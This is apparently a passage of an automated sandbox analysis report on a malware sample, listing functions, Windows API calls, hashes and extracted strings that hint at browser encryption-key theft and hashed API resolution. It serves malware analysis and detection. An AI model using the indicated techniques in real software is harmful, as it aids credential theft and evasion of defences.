                                                                                                                                                                                            • Instruction Fuzzy Hash: E8B119B55207068BDB349F25CC92BB7B3A9EF44308F54446DF983CA680EEB5E995CB10
                                                                                                                                                                                            Function 00226930 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                            • Instruction ID: 26b8a72bd147c30dc3db3e5bba64abf51618eba6952eb49e52bfa0936a750f67
                                                                                                                                                                                            • Opcode Fuzzy Hash: 35a99ddb84e099ae0a6607a91bfdc36c762ef67c046712ac124d7e6b556b889d
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA519172D1022AEFDF04CF98C841AEEBBB2FF88304F598059E515AB241C775AA50CF90
                                                                                                                                                                                            Function 0020469F Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                            • Instruction ID: 77b282bd6ac5d8c61cb59a58e7d346c01834fca2dd9d447cefed7c94fdb474d1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ea3d2115689472d574504233d5e479e60840e41d715be4192dfc74f350eec6e
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA41B621229BC49FC739DE6C484009ABFE1DEB71407488A9DE4C7C7B43C614EA19C7A6
                                                                                                                                                                                            Function 00204539 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                            • Instruction ID: a2fbd2134991d09b88eca86981d183c68ace8b709a5844b27eacb59ef644c6a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: f56874ec80299a65c106a4b56e3c8b83f00e55cf319624107219137b7508230b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31252231ABC68FC319CA9D5C40446FFA2AEB210038DCA9DD4DD9BB03C564E909C7B2
                                                                                                                                                                                            Function 00220C70 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction ID: 333316db32f76ffac08694a1d937b3e55f1f95eda43df40169436302514e59df
                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21110BF722217363D6048EFDF4F46B7A396EBC5321B2D4377D0424B76AD222A9659500
                                                                                                                                                                                            Function 00201424 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a990686b6d46b1b9f0493715a082d4f8a18f982f98cb27ff36edeb5967b6f730
                                                                                                                                                                                            • Instruction ID: efc366989b240f35216fda61b4e84706a50aead457113663928c06f252dc9c80
                                                                                                                                                                                            • Opcode Fuzzy Hash: a990686b6d46b1b9f0493715a082d4f8a18f982f98cb27ff36edeb5967b6f730
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43016C72E2407106F70C4B3AAC16436BB94A75732234743ABFA87EA0D2C419D535D7E4
                                                                                                                                                                                            Function 00213820 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                            • Instruction ID: 3bf9555b049d395266e132c0daf58a5fb0493706c19f40800d9f76db5439bcc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F0127251102D6B9F09DF64D816CBF7796EF48250B018129FC165B150C631EC70DBD4
                                                                                                                                                                                            Function 00215040 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 442sleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021504A
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00215155
                                                                                                                                                                                              • Part of subcall function 0020B64E: __EH_prolog3.LIBCMT ref: 0020B655
                                                                                                                                                                                              • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
                                                                                                                                                                                              • Part of subcall function 00214DC7: __EH_prolog3_GS.LIBCMT ref: 00214DD1
                                                                                                                                                                                              • Part of subcall function 00216920: __EH_prolog3_GS.LIBCMT ref: 00216927
                                                                                                                                                                                              • Part of subcall function 002147EA: __EH_prolog3_GS.LIBCMT ref: 002147F4
                                                                                                                                                                                              • Part of subcall function 002113E5: __EH_prolog3.LIBCMT ref: 002113EC
                                                                                                                                                                                              • Part of subcall function 00214CF6: __EH_prolog3_GS.LIBCMT ref: 00214CFD
                                                                                                                                                                                              • Part of subcall function 002168CD: __EH_prolog3.LIBCMT ref: 002168D4
                                                                                                                                                                                              • Part of subcall function 00214FCB: __EH_prolog3_GS.LIBCMT ref: 00214FD2
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 002155F3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3$InfoNativeSleepSystem
                                                                                                                                                                                            • String ID: !$.txt$/Up$1735725670$789593363246702628$MyApp/1.0$x64$x86
                                                                                                                                                                                            • API String ID: 782859002-2550200081
                                                                                                                                                                                            • Opcode ID: a9f2917305b734fd9a7ad4e9d627ebe83bf4d8a2d630442477f7ffa2d3c37e4c
                                                                                                                                                                                            • Instruction ID: 82bbc99798e5f1894e1f5bb7c6cface69f7cf36c3d5589e3890f37ef0092b969
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9f2917305b734fd9a7ad4e9d627ebe83bf4d8a2d630442477f7ffa2d3c37e4c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D028D30D20358EADB15EBA4C95ABEDBBB4AF15300F5040E9E105671C3EB745B98DF62
                                                                                                                                                                                            Function 00206B3E Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 202memorystringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00206B48
                                                                                                                                                                                              • Part of subcall function 0021AE24: __EH_prolog3_GS.LIBCMT ref: 0021AE2E
                                                                                                                                                                                              • Part of subcall function 0020B558: __EH_prolog3.LIBCMT ref: 0020B562
                                                                                                                                                                                              • Part of subcall function 0020B558: _Func_class.LIBCONCRT ref: 0020B607
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020A42C: __EH_prolog3.LIBCMT ref: 0020A433
                                                                                                                                                                                              • Part of subcall function 0020B41D: __EH_prolog3.LIBCMT ref: 0020B424
                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?), ref: 00206C2D
                                                                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 00206C6A
                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00206C74
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00206CFA
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00206D01
                                                                                                                                                                                              • Part of subcall function 0020B51E: __EH_prolog3.LIBCMT ref: 0020B525
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3$Heap$H_prolog3_Process$AllocFreeFunc_classlstrlen
                                                                                                                                                                                            • String ID: \key$en_k$os_c
                                                                                                                                                                                            • API String ID: 3880169058-3393669898
                                                                                                                                                                                            • Opcode ID: 90e95ac2383a5bb3f146f9e6e8cf0b186a2f8d761f6bf821d4d84a4c58c5c1ab
                                                                                                                                                                                            • Instruction ID: f70ccfc897323173d6aec1148656b440848810bc613c356568825153e4d7006a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e95ac2383a5bb3f146f9e6e8cf0b186a2f8d761f6bf821d4d84a4c58c5c1ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: FC719970D20348EBDF14EBA4DD49BAEBBB4AF46300F504059F505AB292DB701A18CFA2
                                                                                                                                                                                            Function 0021AE24 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021AE2E
                                                                                                                                                                                              • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
                                                                                                                                                                                              • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
                                                                                                                                                                                              • Part of subcall function 0020B7BF: __EH_prolog3.LIBCMT ref: 0020B7C6
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 0021AF79
                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 0021AF82
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$Heap$AllocH_prolog3H_prolog3_catch_Processctype
                                                                                                                                                                                            • String ID: 17211235534172093521$18081020163143810973$8780785037186610294$@$Kernel32.dll$ntdll.dll
                                                                                                                                                                                            • API String ID: 614703607-287778538
                                                                                                                                                                                            • Opcode ID: f9534a42ccaf838697f52081e0d56e39f9f291e85f89161e539cfedc23b9ee38
                                                                                                                                                                                            • Instruction ID: cc2e450caa61e659f3c816578dd352b0bd808ce7626c28e539f64aae2e10fa8a
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9534a42ccaf838697f52081e0d56e39f9f291e85f89161e539cfedc23b9ee38
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C5149B1D1034CEFDB11EFA8C945ADEBBB9AF19344F10406AE404A7281D6705E55CF61
                                                                                                                                                                                            Function 00222738 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00222857
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00222965
                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00222AB7
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00222AD2
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                            • String ID: ,k$$csm$csm$csm
                                                                                                                                                                                            • API String ID: 2751267872-3737283564
                                                                                                                                                                                            • Opcode ID: a13e0ddc9aee0a2a642b6ba00b7cca06aba287c6f9979a01dcf181957afd8aa0
                                                                                                                                                                                            • Instruction ID: 78d0a1e779bc585bd94eebb5185d6439643219e0ad6447b8b8251d26ce2cb9c8
                                                                                                                                                                                            • Opcode Fuzzy Hash: a13e0ddc9aee0a2a642b6ba00b7cca06aba287c6f9979a01dcf181957afd8aa0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 04B15A3182022AFFCF28DFD4E8419AEB7B5FF14310B144559E8116B212D736DA69CFA1
                                                                                                                                                                                            Function 0021F7D0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0021F7D6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0021F7E4
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0021F7F5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0021F806
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                            • Opcode ID: 806412feefc237998a99836d57815faf5ecc8c0d67f5e96149a858473b852800
                                                                                                                                                                                            • Instruction ID: 450d9256cef6ce853176d5c47bad58629a513867760599d7fca4501173ac5831
                                                                                                                                                                                            • Opcode Fuzzy Hash: 806412feefc237998a99836d57815faf5ecc8c0d67f5e96149a858473b852800
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08E012B556A310AF97186F70BC0E88A7EB9FA1F7523015126F415D3160E770445CDF9A
                                                                                                                                                                                            Function 00233DB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                            • Opcode ID: f254e651d7ba42da03ab8199729059b42e09b761e1f2e273d47e2eb1434fd019
                                                                                                                                                                                            • Instruction ID: 7cc06866881511db28cd15e94d94b14cba947921e058b32309b58a3f5e77eea7
                                                                                                                                                                                            • Opcode Fuzzy Hash: f254e651d7ba42da03ab8199729059b42e09b761e1f2e273d47e2eb1434fd019
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10B124B0E24355AFDB15EF98D842BAD7BB1BF49300F144199E90597382C7B0AE61CF61
                                                                                                                                                                                            Function 0023E8B8 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(03371D40,03371D40,?,7FFFFFFF,?,0023EB88,03371D40,03371D40,?,03371D40,?,?,?,?,03371D40,?), ref: 0023E95E
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0023EA19
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0023EAA8
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EAF3
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EAF9
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB2F
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB35
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB45
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 127012223-0
                                                                                                                                                                                            • Opcode ID: 3a9433195308d5b2b7ac064074809e4a3f6c673935dcebebf3c1f85475a7b450
                                                                                                                                                                                            • Instruction ID: 6c49f142c649bdb2a53f9f9089cccce95cccaa2fb89893041fa4b2a7e2f5d279
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9433195308d5b2b7ac064074809e4a3f6c673935dcebebf3c1f85475a7b450
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB7117F2A2020A5BDF219E548C41FAFB7BAAF49314F2A0455F805A72C1D771DC38CBA1
                                                                                                                                                                                            Function 0021F996 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0021F9DF
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0021FA0B
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0021FA4A
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FA67
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0021FAA6
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0021FAC3
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FB05
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FB28
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
